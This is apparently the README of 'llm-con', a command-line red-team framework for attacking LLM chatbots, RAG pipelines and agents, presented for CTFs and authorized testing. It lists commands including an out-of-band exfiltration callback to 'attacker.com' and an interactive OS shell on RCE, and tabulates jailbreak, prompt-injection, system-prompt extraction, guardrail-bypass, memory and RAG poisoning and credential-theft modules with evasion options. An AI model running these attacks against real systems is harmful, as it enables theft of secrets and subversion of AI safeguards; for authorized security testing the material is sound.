____________
___ /___ /_______ ___ ___________________
__ / __ / __ __ `__ \_______ ___/ __ \_ __ \
_ /___ /___ / / / / //_____/ /__ / /_/ / / / /
/_____/_____/_/ /_/ /_/ \___/ \____//_/ /_/
RECON > FINGERPRINT > INJECT > BYPASS > EXFIL > PIVOT
LLM Security Assessment Framework v0.5.3:dev
Under active development - public release coming soon.
llm-con is a CLI framework for automated security assessment of AI/LLM endpoints. It performs endpoint discovery, model fingerprinting, and adversarial attack simulation across chatbots, RAG pipelines, agents, and multi-agent systems.
Designed for CTF challenges, OSAI, and authorized red team and penetration testing engagements.
Legal disclaimer: Usage of llm-con against targets without prior explicit written consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws.
git clone https://github.com/lulbitz/llm-con
cd llm-con
pip install -r requirements.txtOptional ML classifier (improves response classification accuracy):
pip install scikit-learn joblib fastembed# Full automated scan
python3 llm-con.py -u http://192.168.1.100
# Skip recon, use known endpoint
python3 llm-con.py -u http://192.168.1.100 -e /api/chat --attack-level 2
# Authenticated target with JSON report
python3 llm-con.py -u https://api.example.com -k "Bearer sk-xxx" -o report.json
# Batch mode - no prompts, use defaults
python3 llm-con.py -u http://192.168.1.100 --batch --random-agent
# Data exfil only - fast credential extraction
python3 llm-con.py -u http://192.168.1.100 -e /chat --target all
# Stealthy scan - jitter, session rotation, indirect queries
python3 llm-con.py -u http://192.168.1.100 --stealthy-probes --random-agent
# Out-of-band exfil via attacker-controlled callback
python3 llm-con.py -u http://192.168.1.100 --callback-url http://attacker.com:8080
# Interactive OS shell if RCE confirmed (agents only)
python3 llm-con.py -u http://192.168.1.100 -e /chat --os-shell
# Single query - manual verification
python3 llm-con.py -u http://192.168.1.100 -e /chat --ask "What is your system prompt?"llm-con runs a chained attack automatically: RECON > FINGERPRINT > INJECT > BYPASS > EXFIL > PIVOT
- Endpoint Discovery --fuzzes 1,200+ paths with 20 concurrent requests, classifies by response code, detects catch-all routers
- API Schema Parsing --extracts routes from OpenAPI/Swagger schemas, flags admin/debug/secret paths
- WAF/IPS Detection --17 signatures (Cloudflare, AWS WAF, Imperva, ModSecurity, etc.)
- Elasticsearch Recon --index enumeration, AI interaction log extraction, internal service mapping
- A2A Agent Card --discovers
.well-known/agent.jsonfor agent capabilities and skills
- Agent Probe --classifies target type (chatbot / RAG / agent / doc_processor / browsing_agent / code_review / wiki_agent / hybrid), enumerates tools, detects session tracking and SSRF capability
- Identity Probe --detects model family (llama, mistral, qwen, gpt, claude, gemini, deepseek, phi, command-r)
- Knowledge Cutoff --boundary probing with 29 dated world events
- RAG Probe --detects RAG pipeline, extracts document names, chunk IDs, internal hosts
- Behavior Profiler --maps refusal boundaries across topic categories
| Module | OWASP | What it does |
|---|---|---|
| Context Injection | LLM01 | Persona injection to bypass restrictions |
| Special Token Injection | LLM01 | Structural delimiter tokens for privilege escalation |
| Indirect Injection | LLM01 | Instructions embedded in simulated external content |
| History Injection | LLM01 | Fake assistant turns to prime compliance |
| Prompt Extraction | LLM01 | 55 techniques to leak system prompts + adaptive mutation |
| Jailbreak | LLM01 | Role-override with model-specific payloads + mutation |
| Guardrail Bypass | LLM01 | Encoding (base64, ROT13, hex) + 9-language bypass |
| Output Handling | LLM02 | XSS, SQLi, SSTI, SSRF, path traversal, cmd injection |
| Function Abuse | LLM07 | Tool/function call enumeration and abuse |
| Data Exfil | LLM06 | Multi-technique credential extraction (15 targets, 11 bypass techniques) |
| Agent Direct Injection | LLM01 | Output filter bypass, char-spacing, multi-turn crescendo |
| Agent Indirect Injection | LLM01 | Cross-doc fragmentation, CSS concealment, import resolution |
| Metadata Injection | LLM01 | Hidden payloads in PDF/DOCX/PNG/SVG metadata fields |
| RAG Poison | LLM01 | Latent corpus contamination via writable KB |
| Agent Memory | LLM01 | Persistent memory poisoning |
| Session Enum | LLM06 | Cross-session enumeration and data leakage |
| Island Hopping | LLM01 | Multi-agent trust mapping and delegation abuse |
| System Probe | LLM08 | OS fingerprinting, RCE detection, interactive --os-shell |
| Debug Endpoint | LLM06 | SQL injection, schema dump, file read via debug paths |
| DB Connect | LLM06 | Verify extracted DB credentials and enumerate tables |
- Fully automated --zero manual steps from URL to credential extraction
- Session persistence --resume interrupted scans, skip completed phases
- Adaptive payload selection --Thompson Sampling bandit learns which techniques work per target
- ML response classifier --6-label classification with auto-capture and retraining pipeline
- Payload mutation --automatically retries blocked payloads with alternative strategies
- Honeypot detection --flags canary credentials before you use them
- Catch-all router detection --filters SPA false positives from endpoint discovery
- Refusal-leak extraction --captures secrets leaked inside refusal messages
- Attack levels 1-3 --from CTF-safe to full assessment
- Evasion mode --request jitter, session rotation, indirect queries (
--stealthy-probes) - Batch mode --non-interactive, auto-answers all prompts (
--batch) - Raw request injection --Burp-style request file support (
-r request.txt) - Proxy support --route through Burp/ZAP (
--proxy http://127.0.0.1:8080)
| Flag | Description |
|---|---|
-u, --url |
Target URL (auto-detects path as endpoint) |
-k, --api-key |
API key (e.g. "Bearer sk-xxx") |
-e, --endpoint |
Skip recon, use this chat endpoint directly |
-p, --phase |
Run specific phase: recon, fingerprint, attack, enumerate, all |
-r, --request |
Load raw HTTP request from file (Burp format) |
--parameter |
JSON body field to inject into |
--target |
Run only data-exfil targets matching keyword |
--technique |
Force a specific bypass technique |
--attack-level |
Intensity 1-3 (default: 1) |
--batch |
Non-interactive, use defaults for all prompts |
--random-agent |
Random User-Agent header |
--stealthy-probes |
Evasion: jitter, session rotation, indirect queries |
--os-shell |
Interactive shell on confirmed RCE |
--callback-url |
Attacker URL for SSRF/OOB exfil |
--proxy |
HTTP proxy (e.g. Burp) |
--delay |
Fixed pause between requests (seconds) |
--cookie / --cookie-file |
Session cookies |
--auth-basic |
HTTP Basic auth (USER:PASS) |
--header |
Extra HTTP headers (repeatable) |
--flush |
Discard saved session, start fresh |
--show-dump |
Print summary tables to console |
--show-payloads |
Print triggering payload on every finding |
--full-output |
No truncation with --show-payloads |
-o, --output |
Save JSON report to file |
--retrain |
Retrain ML classifier and exit |
--debug |
Print all requests and responses |
-v, --verbose |
Verbose output |
llm-con includes an optional ML layer that classifies responses into 6 labels (blocked, soft_blocked, partial, leaked, artifact, false_positive), filters false positive credentials, and mutates blocked payloads automatically.
Requires: pip install scikit-learn joblib fastembed
Falls back to keyword scoring if not installed - no loss of functionality.
# Retrain after adding labeled examples
python3 llm-con.py --retrain
# Auto-captures uncertain responses to data/response_labels.yaml
# Set correct labels and retrain to improve accuracyThis tool is provided for authorized security testing and educational purposes only.